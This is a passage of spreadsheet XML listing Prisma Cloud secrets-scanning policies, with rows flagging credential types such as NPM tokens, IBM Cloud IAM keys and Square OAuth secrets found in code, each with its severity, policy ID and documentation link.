      <c r="AK536" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" t="inlineStr"/>
      <c r="B537" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C537" s="2" t="inlineStr"/>
      <c r="D537" t="inlineStr"/>
      <c r="E537" t="inlineStr"/>
      <c r="F537" t="inlineStr"/>
      <c r="G537" t="b">
        <v>1</v>
      </c>
      <c r="H5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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J537" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K537" t="inlineStr">
        <is>
          <t>Typeform Personal Access Token detected in code</t>
        </is>
      </c>
      <c r="L537" t="inlineStr"/>
      <c r="M537" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N537" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O537" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P537" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q537" t="inlineStr"/>
      <c r="R537" t="inlineStr"/>
      <c r="S537" t="inlineStr"/>
      <c r="T537" t="b">
        <v>0</v>
      </c>
      <c r="U537" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V537" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W537" t="inlineStr">
        <is>
          <t>Typeform Personal Access Token</t>
        </is>
      </c>
      <c r="X537" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-103</t>
        </is>
      </c>
      <c r="Y537" t="inlineStr"/>
      <c r="Z537" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA537" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB537" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC537" t="inlineStr">
        <is>
          <t>CKV_SECRET_103</t>
        </is>
      </c>
      <c r="AD537" t="b">
        <v>1</v>
      </c>
      <c r="AE537" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF537" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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7" t="inlineStr">
        <is>
          <t>7cc1b5f7-f646-4f9d-b5fe-7396f5f328f2</t>
        </is>
      </c>
      <c r="AI537" t="inlineStr"/>
      <c r="AJ537" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK537" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" t="inlineStr"/>
      <c r="B538" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C538" s="2" t="inlineStr"/>
      <c r="D538" t="inlineStr"/>
      <c r="E538" t="inlineStr"/>
      <c r="F538" t="inlineStr"/>
      <c r="G538" t="b">
        <v>1</v>
      </c>
      <c r="H5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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J538" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K538" t="inlineStr">
        <is>
          <t>NPM Token detected in code</t>
        </is>
      </c>
      <c r="L538" t="inlineStr"/>
      <c r="M538" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N538" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O538" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P538" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q538" t="inlineStr"/>
      <c r="R538" t="inlineStr"/>
      <c r="S538" t="inlineStr"/>
      <c r="T538" t="b">
        <v>0</v>
      </c>
      <c r="U538" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V538" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W538" t="inlineStr">
        <is>
          <t>NPM Token</t>
        </is>
      </c>
      <c r="X538" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-12</t>
        </is>
      </c>
      <c r="Y538" t="inlineStr"/>
      <c r="Z538" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA538" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB538" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC538" t="inlineStr">
        <is>
          <t>CKV_SECRET_12</t>
        </is>
      </c>
      <c r="AD538" t="b">
        <v>1</v>
      </c>
      <c r="AE538" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF538" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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8" t="inlineStr">
        <is>
          <t>46bfa5d5-df04-4390-85ce-f312d62677f4</t>
        </is>
      </c>
      <c r="AI538" t="inlineStr"/>
      <c r="AJ538" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK538" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" t="inlineStr"/>
      <c r="B539" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C539" s="2" t="inlineStr"/>
      <c r="D539" t="inlineStr"/>
      <c r="E539" t="inlineStr"/>
      <c r="F539" t="inlineStr"/>
      <c r="G539" t="b">
        <v>1</v>
      </c>
      <c r="H5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39" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J539" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K539" t="inlineStr">
        <is>
          <t>IBM Cloud IAM Key detected in code</t>
        </is>
      </c>
      <c r="L539" t="inlineStr"/>
      <c r="M539" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N539" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O539" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P539" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q539" t="inlineStr"/>
      <c r="R539" t="inlineStr"/>
      <c r="S539" t="inlineStr"/>
      <c r="T539" t="b">
        <v>0</v>
      </c>
      <c r="U539" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V539" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W539" t="inlineStr">
        <is>
          <t>IBM Cloud IAM Key</t>
        </is>
      </c>
      <c r="X539" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-7</t>
        </is>
      </c>
      <c r="Y539" t="inlineStr"/>
      <c r="Z539" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA539" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB539" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC539" t="inlineStr">
        <is>
          <t>CKV_SECRET_7</t>
        </is>
      </c>
      <c r="AD539" t="b">
        <v>1</v>
      </c>
      <c r="AE539" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF539" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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39" t="inlineStr">
        <is>
          <t>6174425e-9502-41f2-8256-09ea40ae4d2e</t>
        </is>
      </c>
      <c r="AI539" t="inlineStr"/>
      <c r="AJ539" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK539" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" t="inlineStr"/>
      <c r="B540" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C540" s="2" t="inlineStr"/>
      <c r="D540" t="inlineStr"/>
      <c r="E540" t="inlineStr"/>
      <c r="F540" t="inlineStr"/>
      <c r="G540" t="b">
        <v>1</v>
      </c>
      <c r="H5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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J540" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K540" t="inlineStr">
        <is>
          <t>Grafana service account token detected in code</t>
        </is>
      </c>
      <c r="L540" t="inlineStr"/>
      <c r="M540" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N540" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O540" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P540" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q540" t="inlineStr"/>
      <c r="R540" t="inlineStr"/>
      <c r="S540" t="inlineStr"/>
      <c r="T540" t="b">
        <v>0</v>
      </c>
      <c r="U540" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V540" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W540" t="inlineStr">
        <is>
          <t>Grafana service account token</t>
        </is>
      </c>
      <c r="X540" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-220</t>
        </is>
      </c>
      <c r="Y540" t="inlineStr"/>
      <c r="Z540" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA540" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB540" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC540" t="inlineStr">
        <is>
          <t>CKV_SECRET_220</t>
        </is>
      </c>
      <c r="AD540" t="b">
        <v>1</v>
      </c>
      <c r="AE540" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF540" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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0" t="inlineStr">
        <is>
          <t>7c042664-aedb-48a2-aaaf-f8558810300c</t>
        </is>
      </c>
      <c r="AI540" t="inlineStr"/>
      <c r="AJ540" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK540" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" t="inlineStr"/>
      <c r="B541" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C541" s="2" t="inlineStr"/>
      <c r="D541" t="inlineStr"/>
      <c r="E541" t="inlineStr"/>
      <c r="F541" t="inlineStr"/>
      <c r="G541" t="b">
        <v>1</v>
      </c>
      <c r="H5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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J541" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K541" t="inlineStr">
        <is>
          <t>Flutterwave API Key detected in code</t>
        </is>
      </c>
      <c r="L541" t="inlineStr"/>
      <c r="M541" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N541" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O541" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P541" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q541" t="inlineStr"/>
      <c r="R541" t="inlineStr"/>
      <c r="S541" t="inlineStr"/>
      <c r="T541" t="b">
        <v>0</v>
      </c>
      <c r="U541" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V541" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W541" t="inlineStr">
        <is>
          <t>Flutterwave API Key</t>
        </is>
      </c>
      <c r="X541" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-98</t>
        </is>
      </c>
      <c r="Y541" t="inlineStr"/>
      <c r="Z541" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA541" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB541" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC541" t="inlineStr">
        <is>
          <t>CKV_SECRET_98</t>
        </is>
      </c>
      <c r="AD541" t="b">
        <v>1</v>
      </c>
      <c r="AE541" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF541" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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1" t="inlineStr">
        <is>
          <t>405a1c5a-ca6b-40cd-83bc-4fd9fd900ecd</t>
        </is>
      </c>
      <c r="AI541" t="inlineStr"/>
      <c r="AJ541" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK541" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" t="inlineStr"/>
      <c r="B542" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C542" s="2" t="inlineStr"/>
      <c r="D542" t="inlineStr"/>
      <c r="E542" t="inlineStr"/>
      <c r="F542" t="inlineStr"/>
      <c r="G542" t="b">
        <v>1</v>
      </c>
      <c r="H5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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J542" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K542" t="inlineStr">
        <is>
          <t>Notion Integration Token detected in code</t>
        </is>
      </c>
      <c r="L542" t="inlineStr"/>
      <c r="M542" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N542" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O542" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P542" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q542" t="inlineStr"/>
      <c r="R542" t="inlineStr"/>
      <c r="S542" t="inlineStr"/>
      <c r="T542" t="b">
        <v>0</v>
      </c>
      <c r="U542" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V542" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W542" t="inlineStr">
        <is>
          <t>Notion Integration Token</t>
        </is>
      </c>
      <c r="X542" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-55</t>
        </is>
      </c>
      <c r="Y542" t="inlineStr"/>
      <c r="Z542" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA542" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB542" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC542" t="inlineStr">
        <is>
          <t>CKV_SECRET_55</t>
        </is>
      </c>
      <c r="AD542" t="b">
        <v>1</v>
      </c>
      <c r="AE542" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF542" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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2" t="inlineStr">
        <is>
          <t>8dcf5a77-4822-49f5-ab61-fcd7c748feea</t>
        </is>
      </c>
      <c r="AI542" t="inlineStr"/>
      <c r="AJ542" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK542" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" t="inlineStr"/>
      <c r="B543" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C543" s="2" t="inlineStr"/>
      <c r="D543" t="inlineStr"/>
      <c r="E543" t="inlineStr"/>
      <c r="F543" t="inlineStr"/>
      <c r="G543" t="b">
        <v>1</v>
      </c>
      <c r="H5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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J543" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K543" t="inlineStr">
        <is>
          <t>Confluent Key detected in code</t>
        </is>
      </c>
      <c r="L543" t="inlineStr"/>
      <c r="M543" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N543" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O543" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P543" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q543" t="inlineStr"/>
      <c r="R543" t="inlineStr"/>
      <c r="S543" t="inlineStr"/>
      <c r="T543" t="b">
        <v>0</v>
      </c>
      <c r="U543" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V543" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W543" t="inlineStr">
        <is>
          <t>Confluent Keys</t>
        </is>
      </c>
      <c r="X543" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-32</t>
        </is>
      </c>
      <c r="Y543" t="inlineStr"/>
      <c r="Z543" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA543" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB543" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC543" t="inlineStr">
        <is>
          <t>CKV_SECRET_32</t>
        </is>
      </c>
      <c r="AD543" t="b">
        <v>1</v>
      </c>
      <c r="AE543" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF543" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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3" t="inlineStr">
        <is>
          <t>720b664c-19cb-4e26-a6e5-1beb402734a5</t>
        </is>
      </c>
      <c r="AI543" t="inlineStr"/>
      <c r="AJ543" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK543" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" t="inlineStr"/>
      <c r="B544" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C544" s="2" t="inlineStr"/>
      <c r="D544" t="inlineStr"/>
      <c r="E544" t="inlineStr"/>
      <c r="F544" t="inlineStr"/>
      <c r="G544" t="b">
        <v>1</v>
      </c>
      <c r="H5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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J544" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K544" t="inlineStr">
        <is>
          <t>Mailgun Domain Sending Key detected in code</t>
        </is>
      </c>
      <c r="L544" t="inlineStr"/>
      <c r="M544" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N544" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O544" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P544" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q544" t="inlineStr"/>
      <c r="R544" t="inlineStr"/>
      <c r="S544" t="inlineStr"/>
      <c r="T544" t="b">
        <v>0</v>
      </c>
      <c r="U544" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V544" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W544" t="inlineStr">
        <is>
          <t>Mailgun Domain Sending Key</t>
        </is>
      </c>
      <c r="X544" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-104</t>
        </is>
      </c>
      <c r="Y544" t="inlineStr"/>
      <c r="Z544" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA544" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB544" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC544" t="inlineStr">
        <is>
          <t>CKV_SECRET_104</t>
        </is>
      </c>
      <c r="AD544" t="b">
        <v>1</v>
      </c>
      <c r="AE544" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF544" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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4" t="inlineStr">
        <is>
          <t>9d209d2e-d453-4db4-a4f1-f74b976c6e76</t>
        </is>
      </c>
      <c r="AI544" t="inlineStr"/>
      <c r="AJ544" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK544" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" t="inlineStr"/>
      <c r="B545" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C545" s="2" t="inlineStr"/>
      <c r="D545" t="inlineStr"/>
      <c r="E545" t="inlineStr"/>
      <c r="F545" t="inlineStr"/>
      <c r="G545" t="b">
        <v>1</v>
      </c>
      <c r="H5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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J545" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K545" t="inlineStr">
        <is>
          <t>FullStory API Key detected in code</t>
        </is>
      </c>
      <c r="L545" t="inlineStr"/>
      <c r="M545" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N545" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O545" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P545" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q545" t="inlineStr"/>
      <c r="R545" t="inlineStr"/>
      <c r="S545" t="inlineStr"/>
      <c r="T545" t="b">
        <v>0</v>
      </c>
      <c r="U545" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V545" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W545" t="inlineStr">
        <is>
          <t>FullStory API Key</t>
        </is>
      </c>
      <c r="X545" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-42</t>
        </is>
      </c>
      <c r="Y545" t="inlineStr"/>
      <c r="Z545" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA545" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB545" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC545" t="inlineStr">
        <is>
          <t>CKV_SECRET_42</t>
        </is>
      </c>
      <c r="AD545" t="b">
        <v>1</v>
      </c>
      <c r="AE545" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF545" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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5" t="inlineStr">
        <is>
          <t>84c57881-ad48-4959-8036-84c20699c43d</t>
        </is>
      </c>
      <c r="AI545" t="inlineStr"/>
      <c r="AJ545" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK545" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" t="inlineStr"/>
      <c r="B546" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C546" s="2" t="inlineStr"/>
      <c r="D546" t="inlineStr"/>
      <c r="E546" t="inlineStr"/>
      <c r="F546" t="inlineStr"/>
      <c r="G546" t="b">
        <v>1</v>
      </c>
      <c r="H5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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J546" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K546" t="inlineStr">
        <is>
          <t>Octopus Deploy API key detected in code</t>
        </is>
      </c>
      <c r="L546" t="inlineStr"/>
      <c r="M546" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N546" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O546" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P546" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q546" t="inlineStr"/>
      <c r="R546" t="inlineStr"/>
      <c r="S546" t="inlineStr"/>
      <c r="T546" t="b">
        <v>0</v>
      </c>
      <c r="U546" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V546" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W546" t="inlineStr">
        <is>
          <t>Octopus Deploy API key</t>
        </is>
      </c>
      <c r="X546" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-191</t>
        </is>
      </c>
      <c r="Y546" t="inlineStr"/>
      <c r="Z546" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA546" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB546" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC546" t="inlineStr">
        <is>
          <t>CKV_SECRET_191</t>
        </is>
      </c>
      <c r="AD546" t="b">
        <v>1</v>
      </c>
      <c r="AE546" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF546" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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6" t="inlineStr">
        <is>
          <t>aad9870a-d7d8-4e14-9ee5-25dd4ffb4aa9</t>
        </is>
      </c>
      <c r="AI546" t="inlineStr"/>
      <c r="AJ546" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK546" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" t="inlineStr"/>
      <c r="B547" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C547" s="2" t="inlineStr"/>
      <c r="D547" t="inlineStr"/>
      <c r="E547" t="inlineStr"/>
      <c r="F547" t="inlineStr"/>
      <c r="G547" t="b">
        <v>1</v>
      </c>
      <c r="H5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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J547" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K547" t="inlineStr">
        <is>
          <t>Square OAuth Secret detected in code</t>
        </is>
      </c>
      <c r="L547" t="inlineStr"/>
      <c r="M547" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N547" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O547" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P547" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q547" t="inlineStr"/>
      <c r="R547" t="inlineStr"/>
      <c r="S547" t="inlineStr"/>
      <c r="T547" t="b">
        <v>0</v>
      </c>
      <c r="U547" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V547" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W547" t="inlineStr">
        <is>
          <t>Square OAuth Secret</t>
        </is>
      </c>
      <c r="X547" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-16</t>
        </is>
      </c>
      <c r="Y547" t="inlineStr"/>
      <c r="Z547" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA547" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB547" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
